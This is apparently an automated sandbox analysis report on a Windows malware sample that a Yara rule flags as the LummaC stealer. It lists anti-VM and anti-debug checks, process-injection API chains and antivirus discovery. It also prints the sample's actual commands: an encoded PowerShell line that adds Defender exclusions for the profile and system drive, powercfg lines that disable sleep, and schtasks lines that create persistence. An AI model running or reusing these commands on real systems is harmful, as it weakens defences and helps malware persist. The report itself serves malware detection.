Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308460293.000000000386A000.00000004.00000800.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2258316500.000000000386C000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr Binary or memory string: vboxtray
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: setupx 1.exe1.exe, 00000002.00000002.2255302659.0000000000F32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1287987853.0000000001344000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: ZHKYZWVTC38PGAWGZF49K.exe.2.dr Binary or memory string: Vmtoolsd
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: C:\Users\user\Desktop\setupx 1.exe1.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock, 0_2_00C8553B
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CEDC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00CEDC9E
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00D161B4 mov edi, dword ptr fs:[00000030h] 0_2_00D161B4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CFB71C GetProcessHeap, 0_2_00CFB71C
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CED8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00CED8E2
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CEDC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00CEDC9E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CEDC92 SetUnhandledExceptionFilter, 0_2_00CEDC92
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CF5DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00CF5DCE
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CED8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00CED8E2
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CEDC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00CEDC9E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CF5DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00CF5DCE
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00D161B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 0_2_00D161B4
Encrypted powershell cmdline option found
Source: C:\Windows\SysWOW64\cmd.exe Process created: Base64 decoded <#U9o0#> Add-MpPreference <#iuH#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#mVB5jvoc#> -Force <#C8V#>
Source: C:\Windows\SysWOW64\cmd.exe Process created: Base64 decoded <#U9o0#> Add-MpPreference <#iuH#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#mVB5jvoc#> -Force <#C8V#> Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Memory written: C:\Users\user\Desktop\setupx 1.exe1.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process created: C:\Users\user\Desktop\setupx 1.exe1.exe "C:\Users\user\Desktop\setupx 1.exe1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajafuaoqbvadaaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbpahuasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbtafyaqga1agoadgbvagmaiwa+acaalqbgag8acgbjaguaiaa8acmaqwa4afyaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajafuaoqbvadaaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbpahuasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbtafyaqga1agoadgbvagmaiwa+acaalqbgag8acgbjaguaiaa8acmaqwa4afyaiwa+aa=="
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajafuaoqbvadaaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbpahuasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbtafyaqga1agoadgbvagmaiwa+acaalqbgag8acgbjaguaiaa8acmaqwa4afyaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajafuaoqbvadaaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbpahuasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbtafyaqga1agoadgbvagmaiwa+acaalqbgag8acgbjaguaiaa8acmaqwa4afyaiwa+aa==" Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_00CFF048
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: EnumSystemLocalesW, 0_2_00CFB007
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: EnumSystemLocalesW, 0_2_00CFF299
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00CFF334
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetLocaleInfoW, 0_2_00CFF5E6
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: EnumSystemLocalesW, 0_2_00CFF587
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: EnumSystemLocalesW, 0_2_00CFF6BB
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00CFF7AD
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetLocaleInfoW, 0_2_00CFF706
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetLocaleInfoW, 0_2_00CFF8B3
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetLocaleInfoW, 0_2_00CFAB0C
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetLocaleInfoW, 2_2_00CFF8B3
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_00CFF048
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: EnumSystemLocalesW, 2_2_00CFB007
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: EnumSystemLocalesW, 2_2_00CFF299
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetLocaleInfoW, 2_2_00CFAB0C
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 2_2_00CFF334
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetLocaleInfoW, 2_2_00CFF5E6
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: EnumSystemLocalesW, 2_2_00CFF587
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: EnumSystemLocalesW, 2_2_00CFF6BB
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_00CFF7AD
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: GetLocaleInfoW, 2_2_00CFF706
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CEE6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00CEE6D7
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies power options to not sleep / hibernate
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: setupx 1.exe1.exe, 00000002.00000003.1153830614.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139527382.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: setupx 1.exe1.exe PID: 6848, type: MEMORYSTR
